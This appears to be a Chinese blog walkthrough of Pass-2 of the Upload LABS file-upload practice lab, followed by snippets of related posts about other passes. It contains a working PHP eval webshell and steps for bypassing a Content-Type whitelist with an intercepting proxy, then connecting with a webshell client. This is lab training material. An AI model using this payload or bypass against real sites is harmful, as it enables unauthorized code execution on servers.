第二关在后端设置了白名单,只允许上传 MINI类型 为图片的文件 , 我们通过代理工具修改其Content-Type即可

准备一个 2.php 文件 , 文件内容为一句话木马

<?php eval($_POST[-7]);?>

上传 2.php 文件 , 并使用代理拦截请求

修改 Content-Type 值为 image/jpeg (图片类型) , 并转发请求

右键复制图片路径

使用菜刀链接

链接成功

Upload LABS Pass-2相关推荐

  1. Upload labs

    Pass -01(js检查) 题目基于前端js过滤,只能上传图片格式的文件,所以我们用一句话木马,改后缀上传后,用burp抓包,修改文件后缀为php,然后用蚁剑连接, 注意: 文件没有上传在具体题目中 ...

  2. (白帽子学习笔记)前渗透——文件上传upload labs

    读者需知 1.本文仅供学习使用,由于传播和利用此文所造成的损失均由使用者本人负责,文章作者不为此承担责任 2.本文参考了一些文章,如有侵权请联系本人删除 第一关--前端验证 1.将浏览器中的JS代码禁 ...

  3. upload -labs通关解析及上传类型总结和思考

    Pass-01(客户端JS绕过) 客户端JS判断方法:上传一个php文件,用bp抓包,如果没抓到包就弹框说不能上传,就说明是客户端JS检测 客户端JS绕过方法: 方法一: 上传一个图片马格式为jpg, ...

  4. Upload LABS Pass-11

    第十一关在服务端使用了白名单 , 但文件保存路径外漏 , 可以使用00截断 准备一个 11.php 文件 , 内容为一句话木马 <?php eval($_POST[-7]);?> 上传 1 ...

  5. Upload LABS Pass-10

    第十关在后端使用了黑名单 , 将匹配到的后缀名替换为空,使文件不能使用 , 但其只过滤了一遍 , 我们可以使用双写后缀名的方式绕过黑名单 准备一个 10.pphphp 文件 , 内容为一句话木马 &l ...

  6. Upload LABS Pass-9

    第九关在后端使用了黑名单,并过滤了大小写,空格,点以及数据流 , 但未对文件重命名并且只过滤了一遍点和空格 , 我们在文件后缀名添加 点空格点 , 来绕过黑名单 准备一个 9.php 文件 , 内容为 ...

  7. Upload LABS Pass-8

    第八关在后端使用了黑名单 , 并过滤了大小写,点以及空格 , 但并未过滤数据流 , 我们使用代理拦截请求,在文件后缀名中添加数据流,绕过黑名单 准备一个 8.php 文件 , 内容为一句话木马 < ...

  8. Upload LABS Pass-7

    第七关在后端使用了黑名单 , 并过滤了大小写,空格 , 但未过滤点 , 我们使用代理拦截请求,将后缀名添加点. , 来绕过黑名单 准备一个 7.php 文件 , 内容为一句话木马 <?php e ...

  9. Upload LABS Pass-6

    第六关在后端使用了黑名单 , 并过滤了大小写和点 , 但未过滤空格 , 我们使用代理抓包在后缀名中添加空格,即可绕过黑名单 准备一个 6.php 文件 , 内容为一句话木马 <?php eval ...

  10. Upload LABS Pass-5

    第五关在后端使用了黑名单 , 并过滤了空格,点 , 但未过滤大小写 , 我们修改文件后缀大小写来绕过黑名单 准备一个 5.PHP 文件 , 内容为一句话木马 <?php eval($_POST[ ...

最新文章

  1. C:/WINDOWS/system32/x 病毒分析和解决建议
  2. HTC Link是仅适用于日本的6DOF VR头显
  3. GPU — CUDA 编程模型
  4. Navicatfor mysql怎么设置唯一约束
  5. str、tuple、dict之间的相互转换
  6. tensorflow 图像教程 の TF Layers 教程:构建卷积神经网络
  7. python中lines是什么类型_Python中splitlines()方法的使用简介
  8. eazyui ajax传值,jquery easyui ajax data属性传值方式
  9. $NOIp$前的日常
  10. Windows 2003 server下载
  11. java函数的返回值类型_JAVA函数的返回值类型详解以及生成随机数的例题
  12. 云原生 - 阿里云 SLB、CDN、SCDN、DCDN 区别在哪?如何选择?
  13. 安装SQL Server2012报Microsoft.NET Framework4无法安装错误解决方案
  14. c语言控制电机正反转程序,C语言实现控制电机加减速正反转(飞思卡尔C代码)
  15. 基于canvas的图片反色处理
  16. 支付宝支付接口的使用
  17. 一些好用的链接(持续更新)——视频相关
  18. Android之获取手机基本信息、内存信息、网路信息、电池信息,等一共18项数据
  19. 求最大公约数的4种算法(C++)
  20. 升级鸿蒙系统数据备份,鸿蒙系统手机怎么回退到稳定版的EMUI 11.0系统?鸿蒙系统回退到EMUI系统详细教程...

热门文章

  1. Confluence 6 升级以后
  2. 我们来说一说TCP神奇的40ms
  3. 初学JAVA随记——代码练习(二元一次方程)
  4. 《第一行代码》学习笔记11-活动Activity(9)
  5. 基于jQuery向下弹出遮罩图片相册
  6. LeetCode OJ - Path Sum II
  7. I/O的一些简单操作
  8. C# ?? 操作符示例
  9. 使用supervisor提高nodejs调试效率
  10. MQTT工作笔记0006---CONNECT控制报文3